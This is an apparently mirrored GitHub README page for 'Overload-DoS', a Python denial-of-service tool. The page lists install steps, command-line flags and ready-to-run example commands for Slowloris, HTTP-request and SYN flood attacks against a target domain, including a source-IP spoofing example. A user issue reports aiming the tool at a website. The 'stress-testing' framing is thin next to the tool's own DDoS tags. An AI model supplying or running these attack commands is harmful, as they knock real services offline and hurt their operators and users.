Coder Social home page Coder Social logo

codingplanets / overload-dos Goto Github PK

View Code? Open in Web Editor NEW
72.0 3.0 28.0 22 KB

"Overload" is a python program that sends active connections to any target of some sort. It is used to perform a DoS/DDoS attack.

Python 100.00%
ddos dos ddos-attacks ddos-tool ddos-attack-tools ddos-attack python-ddos

overload-dos's Introduction

Overload-DoS

This a very powerful denial of service (DDoS) program. It is very efficient and portable, it is stable and useful for stress-testing companies, it currently has three attack methods. 1) SYN/ICMP with 6 flags including fin, syn, rst, ack, psh and urg. 2) Slowloris/SLOW uses sock.connect to attack. 3) Request/Requester uses httplib to attack. You either choose one of the three attack methods or you can choose all three!

Getting Started

You will need a few different modules installed to execute Overload.

Modules

You will have to use pip to install the modules, colorama, termcolor & requests

sudo apt-get install python-pip
sudo yum install python-pip

Module Installing

Using pip you can install the following modules

sudo pip install colorama termcolor requests

Install Overload-Dos

git clone https://github.com/codingplanets/Overload-DoS
cd Overload-DoS
chmod +x *
./install-overload

Usages

usage: ./Overload-DoS.py -target [target] -port [port] -threads [number threads]

optional arguments:
  -h, --help           show this help message and exit

options:

  -target <ip/domain>  Specify your target
  -timeout <timeout>   Timeout for socket
  -threads <threads>   Set threads number for connection (default = 1000)
  -port <port>         Specify port target (default = 80)
  -sleep <sleep time>  Set sleep time for reconnection
  -spoof <spoofed ip>  Specify spoofed IP address
  -request             Enable request target
  -syn                 Enable syn attack
  -slow                Enable slow attack
  -fakeip              Option to create fake ip if not specifed for spoofed ip

Examples

Slowloris/SLOW attack method

./Overload-DoS.py -target www.target.com -port 80 -threads 2000 -slow

Request/Requester attack method

./Overload-DoS.py -target www.target.com -port 80 -threads 2000 -request

SYN/6 flagged ICMP attack method

./Overload-DoS.py -target www.target.com -syn -threads 5000

SLOW/Request/SYN attack method

./Overload-DoS.py -target www.target.com -port 80 -threads 2000 -request -slow -syn

SLOW/Request/SYN spoofed IP attack method

./Overload-DoS.py -target www.target.com -port 80 -threads 2000 -request -slow -syn -spoof 8.8.8.8

Built With

Authors

License

This project is licensed under the MIT License

overload-dos's People

Contributors

codingplanets avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar

overload-dos's Issues

Script doesn't work

Hello, I tried to run this scrip, but it didn't do anything, the website that I targeted was still running.. any solution?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.